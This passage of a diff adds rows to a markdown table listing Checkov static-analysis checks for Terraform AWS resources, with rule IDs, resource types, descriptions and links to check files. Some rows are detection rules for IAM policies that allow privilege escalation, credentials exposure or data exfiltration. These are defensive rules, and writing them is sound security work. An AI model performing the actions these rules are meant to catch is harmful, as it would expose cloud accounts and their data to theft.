+|  329 | CKV_AWS_232     | resource | aws_network_acl                                         | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22                                                                                                                                                   | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py)                                                                 |
+|  330 | CKV_AWS_232     | resource | aws_network_acl_rule                                    | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22                                                                                                                                                   | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py)                                                                 |
+|  331 | CKV_AWS_233     | resource | aws_acm_certificate                                     | Ensure Create before destroy for ACM certificates                                                                                                                                                        | Terraform | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py)                                                                           |
+|  332 | CKV_AWS_234     | resource | aws_acm_certificate                                     | Verify logging preference for ACM certificates                                                                                                                                                           | Terraform | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py)                                                                         |
+|  333 | CKV_AWS_235     | resource | aws_ami_copy                                            | Ensure that copied AMIs are encrypted                                                                                                                                                                    | Terraform | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py)                                                                                           |
+|  334 | CKV_AWS_236     | resource | aws_ami_copy                                            | Ensure AMI copying uses a CMK                                                                                                                                                                            | Terraform | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py)                                                                                                   |
+|  335 | CKV_AWS_237     | resource | aws_api_gateway_rest_api                                | Ensure Create before destroy for API Gateway                                                                                                                                                             | Terraform | [APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py)                                                                     |
+|  336 | CKV_AWS_238     | resource | aws_guardduty_detector                                  | Ensure that GuardDuty detector is enabled                                                                                                                                                                | Terraform | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py)                                                                               |
+|  337 | CKV_AWS_239     | resource | aws_dax_cluster                                         | Ensure DAX cluster endpoint is using TLS                                                                                                                                                                 | Terraform | [DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py)                                                                                                   |
+|  338 | CKV_AWS_240     | resource | aws_kinesis_firehose_delivery_stream                    | Ensure Kinesis Firehose delivery stream is encrypted                                                                                                                                                     | Terraform | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py)                                                               |
+|  339 | CKV_AWS_241     | resource | aws_kinesis_firehose_delivery_stream                    | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK                                                                                                                                     | Terraform | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py)                                                       |
+|  340 | CKV_AWS_242     | resource | aws_mwaa_environment                                    | Ensure MWAA environment has scheduler logs enabled                                                                                                                                                       | Terraform | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py)                                                                               |
+|  341 | CKV_AWS_243     | resource | aws_mwaa_environment                                    | Ensure MWAA environment has worker logs enabled                                                                                                                                                          | Terraform | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py)                                                                                     |
+|  342 | CKV_AWS_244     | resource | aws_mwaa_environment                                    | Ensure MWAA environment has webserver logs enabled                                                                                                                                                       | Terraform | [MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py)                                                                               |
+|  343 | CKV_AWS_245     | resource | aws_db_instance_automated_backups_replication           | Ensure replicated backups are encrypted at rest using KMS CMKs                                                                                                                                           | Terraform | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py)                                                   |
+|  344 | CKV_AWS_246     | resource | aws_rds_cluster_activity_stream                         | Ensure RDS Cluster activity streams are encrypted using KMS CMKs                                                                                                                                         | Terraform | [RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py)                                               |
+|  345 | CKV_AWS_247     | resource | aws_elasticsearch_domain                                | Ensure all data stored in the Elasticsearch is encrypted with a CMK                                                                                                                                      | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py)                                                                   |
+|  346 | CKV_AWS_247     | resource | aws_opensearch_domain                                   | Ensure all data stored in the Elasticsearch is encrypted with a CMK                                                                                                                                      | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py)                                                                   |
+|  347 | CKV_AWS_248     | resource | aws_elasticsearch_domain                                | Ensure that Elasticsearch is not using the default Security Group                                                                                                                                        | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py)                                                                                   |
+|  348 | CKV_AWS_248     | resource | aws_opensearch_domain                                   | Ensure that Elasticsearch is not using the default Security Group                                                                                                                                        | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py)                                                                                   |
+|  349 | CKV_AWS_249     | resource | aws_ecs_task_definition                                 | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions                                                                                                           | Terraform | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py)                                                                           |
+|  350 | CKV_AWS_250     | resource | aws_db_instance                                         | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/)                                          | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py)                                                                       |
+|  351 | CKV_AWS_250     | resource | aws_rds_cluster                                         | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/)                                          | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py)                                                                       |
+|  352 | CKV_AWS_251     | resource | aws_cloudtrail                                          | Ensure CloudTrail logging is enabled                                                                                                                                                                     | Terraform | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py)                                                                                 |
+|  353 | CKV_AWS_252     | resource | aws_cloudtrail                                          | Ensure CloudTrail defines an SNS Topic                                                                                                                                                                   | Terraform | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py)                                                                             |
+|  354 | CKV_AWS_253     | resource | aws_dlm_lifecycle_policy                                | Ensure DLM cross region events are encrypted                                                                                                                                                             | Terraform | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py)                                                                   |
+|  355 | CKV_AWS_254     | resource | aws_dlm_lifecycle_policy                                | Ensure DLM cross region events are encrypted with Customer Managed Key                                                                                                                                   | Terraform | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py)                                                     |
+|  356 | CKV_AWS_255     | resource | aws_dlm_lifecycle_policy                                | Ensure DLM cross region schedules are encrypted                                                                                                                                                          | Terraform | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py)                                                               |
+|  357 | CKV_AWS_256     | resource | aws_dlm_lifecycle_policy                                | Ensure DLM cross region schedules are encrypted using a Customer Managed Key                                                                                                                             | Terraform | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py)                                                 |
+|  358 | CKV_AWS_257     | resource | aws_codecommit_approval_rule_template                   | Ensure CodeCommit branch changes have at least 2 approvals                                                                                                                                               | Terraform | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py)                                                         |
+|  359 | CKV_AWS_258     | resource | aws_lambda_function_url                                 | Ensure that Lambda function URLs AuthType is not None                                                                                                                                                    | Terraform | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py)                                                                                     |
+|  360 | CKV_AWS_259     | resource | aws_cloudfront_response_headers_policy                  | Ensure CloudFront response header policy enforces Strict Transport Security                                                                                                                              | Terraform | [CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py)                                 |
+|  361 | CKV_AWS_260     | resource | aws_security_group                                      | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                                           |
+|  362 | CKV_AWS_260     | resource | aws_security_group_rule                                 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                                           |
+|  363 | CKV_AWS_260     | resource | aws_vpc_security_group_ingress_rule                     | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                                           |
+|  364 | CKV_AWS_261     | resource | aws_alb_target_group                                    | Ensure HTTP HTTPS Target group defines Healthcheck                                                                                                                                                       | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py)                                                               |
+|  365 | CKV_AWS_261     | resource | aws_lb_target_group                                     | Ensure HTTP HTTPS Target group defines Healthcheck                                                                                                                                                       | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py)                                                               |
+|  366 | CKV_AWS_262     | resource | aws_kendra_index                                        | Ensure Kendra index Server side encryption uses CMK                                                                                                                                                      | Terraform | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py)                                                                                     |
+|  367 | CKV_AWS_263     | resource | aws_appflow_flow                                        | Ensure AppFlow flow uses CMK                                                                                                                                                                             | Terraform | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py)                                                                                                   |
+|  368 | CKV_AWS_264     | resource | aws_appflow_connector_profile                           | Ensure AppFlow connector profile uses CMK                                                                                                                                                                | Terraform | [AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py)                                                                   |
+|  369 | CKV_AWS_265     | resource | aws_keyspaces_table                                     | Ensure Keyspaces Table uses CMK                                                                                                                                                                          | Terraform | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py)                                                                                     |
+|  370 | CKV_AWS_266     | resource | aws_db_snapshot_copy                                    | Ensure DB Snapshot copy uses CMK                                                                                                                                                                         | Terraform | [DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py)                                                                                     |
+|  371 | CKV_AWS_267     | resource | aws_comprehend_entity_recognizer                        | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK)                                                                                                  | Terraform | [ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py)                                                   |
+|  372 | CKV_AWS_268     | resource | aws_comprehend_entity_recognizer                        | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK)                                                                                                 | Terraform | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py)                                                 |
+|  373 | CKV_AWS_269     | resource | aws_connect_instance_storage_config                     | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK                                                                                                                                     | Terraform | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py)                     |
+|  374 | CKV_AWS_270     | resource | aws_connect_instance_storage_config                     | Ensure Connect Instance S3 Storage Config uses CMK                                                                                                                                                       | Terraform | [ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py)                                                     |
+|  375 | CKV_AWS_271     | resource | aws_dynamodb_table_replica                              | Ensure DynamoDB table replica KMS encryption uses CMK                                                                                                                                                    | Terraform | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py)                                                                   |
+|  376 | CKV_AWS_272     | resource | aws_lambda_function                                     | Ensure AWS Lambda function is configured to validate code-signing                                                                                                                                        | Terraform | [LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py)                                                                         |
+|  377 | CKV_AWS_273     | resource | aws_iam_user                                            | Ensure access is controlled through SSO and not AWS IAM defined users                                                                                                                                    | Terraform | [IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py)                                                                                 |
+|  378 | CKV_AWS_274     | resource | aws_iam_group_policy_attachment                         | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                                     |
+|  379 | CKV_AWS_274     | resource | aws_iam_policy_attachment                               | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                                     |
+|  380 | CKV_AWS_274     | resource | aws_iam_role                                            | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                                     |
+|  381 | CKV_AWS_274     | resource | aws_iam_role_policy_attachment                          | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                                     |
+|  382 | CKV_AWS_274     | resource | aws_iam_user_policy_attachment                          | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                                     |
+|  383 | CKV_AWS_274     | resource | aws_ssoadmin_managed_policy_attachment                  | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                                     |
+|  384 | CKV_AWS_275     | data     | aws_iam_policy                                          | Disallow policies from using the AWS AdministratorAccess policy                                                                                                                                          | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py)                                                                                         |
+|  385 | CKV_AWS_276     | resource | aws_api_gateway_method_settings                         | Ensure Data Trace is not enabled in API Gateway Method Settings                                                                                                                                          | Terraform | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py)                                                             |
+|  386 | CKV_AWS_277     | resource | aws_security_group                                      | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py)                                                         |
+|  387 | CKV_AWS_277     | resource | aws_security_group_rule                                 | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py)                                                         |
+|  388 | CKV_AWS_277     | resource | aws_vpc_security_group_ingress_rule                     | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1                                                                                                                                        | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py)                                                         |
+|  389 | CKV_AWS_278     | resource | aws_memorydb_snapshot                                   | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK)                                                                                                                          | Terraform | [MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py)                                                             |
+|  390 | CKV_AWS_279     | resource | aws_neptune_cluster_snapshot                            | Ensure Neptune snapshot is securely encrypted                                                                                                                                                            | Terraform | [NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py)                                                                 |
+|  391 | CKV_AWS_280     | resource | aws_neptune_cluster_snapshot                            | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK)                                                                                                                           | Terraform | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py)                                                   |
+|  392 | CKV_AWS_281     | resource | aws_redshift_snapshot_copy_grant                        | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK)                                                                                                                     | Terraform | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py)                               |
+|  393 | CKV_AWS_282     | resource | aws_redshiftserverless_namespace                        | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK)                                                                                                         | Terraform | [RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py)                                                             |
+|  394 | CKV_AWS_283     | data     | aws_iam_policy_document                                 | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource                                                                                                              | Terraform | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py)                                                                                       |
+|  395 | CKV_AWS_284     | resource | aws_sfn_state_machine                                   | Ensure State Machine has X-Ray tracing enabled                                                                                                                                                           | Terraform | [StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py)                                                                                               |
+|  396 | CKV_AWS_285     | resource | aws_sfn_state_machine                                   | Ensure State Machine has execution history logging enabled                                                                                                                                               | Terraform | [StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py)                                                         |
+|  397 | CKV_AWS_286     | resource | aws_iam_group_policy                                    | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                                   |
+|  398 | CKV_AWS_286     | resource | aws_iam_policy                                          | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                                   |
+|  399 | CKV_AWS_286     | resource | aws_iam_role_policy                                     | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                                   |
+|  400 | CKV_AWS_286     | resource | aws_iam_user_policy                                     | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                                   |
+|  401 | CKV_AWS_286     | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                                   |
+|  402 | CKV_AWS_287     | resource | aws_iam_group_policy                                    | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                                   |
+|  403 | CKV_AWS_287     | resource | aws_iam_policy                                          | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                                   |
+|  404 | CKV_AWS_287     | resource | aws_iam_role_policy                                     | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                                   |
+|  405 | CKV_AWS_287     | resource | aws_iam_user_policy                                     | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                                   |
+|  406 | CKV_AWS_287     | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py)                                                                                   |
+|  407 | CKV_AWS_288     | resource | aws_iam_group_policy                                    | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                         |
+|  408 | CKV_AWS_288     | resource | aws_iam_policy                                          | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                         |
+|  409 | CKV_AWS_288     | resource | aws_iam_role_policy                                     | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                         |
+|  410 | CKV_AWS_288     | resource | aws_iam_user_policy                                     | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                         |
+|  411 | CKV_AWS_288     | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py)                                                                                         |
+|  412 | CKV_AWS_289     | resource | aws_iam_group_policy                                    | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                               |
+|  413 | CKV_AWS_289     | resource | aws_iam_policy                                          | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                               |
+|  414 | CKV_AWS_289     | resource | aws_iam_role_policy                                     | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                               |
+|  415 | CKV_AWS_289     | resource | aws_iam_user_policy                                     | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                               |
+|  416 | CKV_AWS_289     | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure IAM policies does not allow permissions management / resource exposure without constraints                                                                                                        | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py)                                                                               |
+|  417 | CKV_AWS_290     | resource | aws_iam_group_policy                                    | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                                   |
+|  418 | CKV_AWS_290     | resource | aws_iam_policy                                          | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                                   |
+|  419 | CKV_AWS_290     | resource | aws_iam_role_policy                                     | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                                   |
+|  420 | CKV_AWS_290     | resource | aws_iam_user_policy                                     | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                                   |
+|  421 | CKV_AWS_290     | resource | aws_ssoadmin_permission_set_inline_policy               | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py)                                                                                                   |
+|  422 | CKV_AWS_291     | resource | aws_msk_cluster                                         | Ensure MSK nodes are private                                                                                                                                                                             | Terraform | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py)                                                                             |
